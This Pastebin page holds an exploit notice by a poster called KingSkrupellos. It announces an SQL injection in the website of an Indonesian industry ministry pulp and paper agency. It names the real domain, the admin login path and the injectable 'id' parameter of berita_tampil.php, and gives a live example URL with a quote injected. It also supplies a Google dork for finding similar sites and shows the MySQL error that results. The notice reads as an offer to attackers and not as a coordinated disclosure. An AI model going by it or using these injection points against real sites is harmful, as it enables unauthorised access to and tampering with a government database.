API tools faq
paste
Advertisement
KingSkrupellos

Kementerian Perindustrian Balai Besar Pulpdan Kertas XSS SQL

KingSkrupellos
May 2nd, 2019
121
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.56 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################
  2.  
  3. # Exploit Title : Kementerian Perindustrian Balai Besar Pulp dan Kertas Indonesia SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/05/2019
  7. # Vendor Homepage : bbpk.go.id
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Kementerian Perindustrian Balai Besar Pulp dan Kertas site:go.id
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Kementerian Perindustrian Balai Besar Pulp dan Kertas Indonesia is prone to an
  23. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  24. data before using it in an SQL query. Exploiting this issue could allow an attacker
  25. to compromise the application, access or modify data, or exploit latent vulnerabilities
  26. in the underlying database. A remote attacker can send a specially crafted request
  27. to the vulnerable application and execute arbitrary SQL commands in
  28. application`s database. Further exploitation of this vulnerability may result
  29. in unauthorized data manipulation. An attacker can exploit this issue using
  30. a browser or with any SQL Injector Tool.
  31.  
  32. ###################################################################
  33.  
  34. # Admin Panel Login Path :
  35. ************************
  36. /login.html
  37.  
  38. # SQL Injection Exploit :
  39. **********************
  40. /berita_tampil.php?id=[SQL Injection]
  41.  
  42. ###################################################################
  43.  
  44. # Example Vulnerable Sites :
  45. *************************
  46. [+] bbpk.go.id/berita_tampil.php?id=1%27
  47.  
  48. ###################################################################
  49.  
  50. # Example SQL Database Error :
  51. ****************************
  52. SQL = #/berita_tampil.php
  53. select * from berita where id_berita = order by id_berita desc
  54.  
  55. Error = You have an error in your SQL syntax; check the manual that corresponds
  56. to your MySQL server version for the right syntax to use near 'order by
  57. id_berita desc' at line 2 [ErrCode = 1064]
  58.  
  59. ###################################################################
  60.  
  61. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  62.  
  63. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!